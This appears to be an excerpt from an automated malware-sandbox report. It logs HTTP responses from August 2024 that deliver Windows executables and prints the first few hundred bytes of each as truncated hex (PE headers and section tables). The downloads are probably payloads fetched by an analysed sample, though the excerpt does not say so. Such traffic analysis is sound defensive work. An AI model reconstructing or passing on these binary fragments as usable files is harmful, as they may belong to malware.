00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 28 Aug 2024 20:55:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:14 GMTContent-Type: application/octet-streamContent-Length: 328232Last-Modified: Wed, 28 Aug 2024 19:58:57 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66cf8181-50228"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 56 81 cf 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d4 04 00 00 06 00 00 00 00 00 00 5e f2 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 b7 52 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 f2 04 00 53 00 00 00 00 00 05 00 42 02 00 00 00 00 00 00 00 00 00 00 00 dc 04 00 28 26 00 00 00 20 05 00 0c 00 00 00 d0 f0 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 d2 04 00 00 20 00 00 00 d4 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 00 05 00 00 04 00 00 00 d6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 da 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 f2 04 00 00 00 00 00 48 00 00 00 02 00 05 00 98 e0 04 00 38 10 00 00 03 00 02 00 0f 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 7e 30 aa dd a7 42 95 cb 06 7e 16 66 63 df d6 a0 d8 12 38 7f e2 e9 9d 75 90 20 b8 08 26 b0 72 e1 93 c7 f4 8f 83 9b ac 8e 4b f5 22 59 60 5f 15 96 a3 a6 42 77 90 ef c5 6f 13 ea 52 a9 58 63 d2 60 d5 dd df 0c 0d a2 1f 28 6f 9c 85 6e a6 8e e0 fc b9 45 35 4c 60 73 b3 c3 8d 42 cf 26 f7 33 b8 6a 6d de fc 63 20 91 ed cd be 31 90 9c ff 58 e3 7a 96 6b 48 f4 6d 19 fd 4a 5b 5f 73 4e 91 f3 4f 8b cc a9 c0 16 08 57 c4 08 a6 0b bc bd 12 2f d1 8e 95 4d f3 33 9d b3 65 0c 7a 3a af d6 ba af ab 37 49 c5 79 1f 37 a8 4c 81 39 f6 f4 6f 20 c0 31 e0 19 f9 c3 3b 25 eb 01 b8 6e 7a 34 da ea 95 57 6c 45 6e 23 a5 37 4e bb 01 f0 f4 0b ea 3a 76 c0 ff 8a a5 4d 1a 19 f1 49 96 b2 04 43 b1 fd a2 88 6b bb 9d fe 7d f2 b7 c1 66 38 5c 78 ba 71 2b 5f e1 77 df 75 21 e9 81 94 62 5a 00 95 78 0b 42 b0 38 79 a1 2d 8c cd 5d 43 97 1b 34 95 a4 d1 35 0e 80 6b 9e 81 83 32 83 f7 2d db 35 50 f3 b3 b0 df db 89 f7 4e 9a 21 9b 57 25 fd f7 c8 06 6d 4
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:15 GMTContent-Type: application/octet-streamContent-Length: 196136Last-Modified: Wed, 28 Aug 2024 19:09:07 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66cf75d3-2fe28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b7 75 cf 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d0 02 00 00 06 00 00 00 00 00 00 5e ee 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 03 00 00 02 00 00 ad 77 03 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 ee 02 00 53 00 00 00 00 00 03 00 42 02 00 00 00 00 00 00 00 00 00 00 00 d8 02 00 28 26 00 00 00 20 03 00 0c 00 00 00 d0 ec 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 ce 02 00 00 20 00 00 00 d0 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 00 03 00 00 04 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 03 00 00 02 00 00 00 d6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 ee 02 00 00 00 00 00 48 00 00 00 02 00 05 00 98 dc 02 00 38 10 00 00 03 00 02 00 0f 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 44 d3 a5 67 31 84 4d 3c 80 8f 5a 66 48 41 ec 5d b4 52 28 f8 87 bd a7 fe c7 d7 8f 76 ac 0c 58 37 0b 55 22 d0 37 b7 8b 2d 4f 2c 93 1d 3f 76 31 a8 83 b0 7a 11 8f a4 d2 3f 14 6c 97 0a 3e c8 b7 5e d7 10 27 10 50 4c 5e 1c 8a 6c 53 ae 0a 47 c6 63 f5 7d a5 af 50 e0 89 16 0e 80 38 b7 91 9e 6f 53 fe d6 4d de ae 16 c9 ac 5b 97 d0 bb 86 09 2d 13 1a 66 66 94 b2 63 66 bb 0b 95 48 12 c9 e7 6a c4 c7 88 c9 25 18 6e a5 92 c3 dd 1e 61 2f 3f 72 1a 52 e9 be 22 c4 19 13 ca d5 12 a0 bd fb 5d 5a 92 d4 f7 a5 6a 53 96 f1 ef 6b c3 57 ba 61 39 39 e1 d3 11 94 7c 0e 70 79 95 f8 6d c1 73 7c 81 68 85 c5 b9 ac 97 0a e6 c2 34 15 cf f0 58 37 04 a7 b6 b5 32 8d ed 9b 83 3f c5 34 50 b4 4e 15 be 12 d8 38 33 22 8e fa 70 65 e1 da 6f 02 81 c2 63 b7 96 77 74 f5 bc 6a fa d0 4c a6 5f 4b b5 af ec 17 51 40 80 15 3b 73 05 e7 d1 08 11 3f 52 4b 96 16 47 4e 00 02 26 91 63 1d ad f4 93 0f 4e 05 dc e6 13 60 a3 70 d1 32 01 1c 2b 06 59 ad 8e 45 3
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:51 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:55 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 28 Aug 2024 20:55:56 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 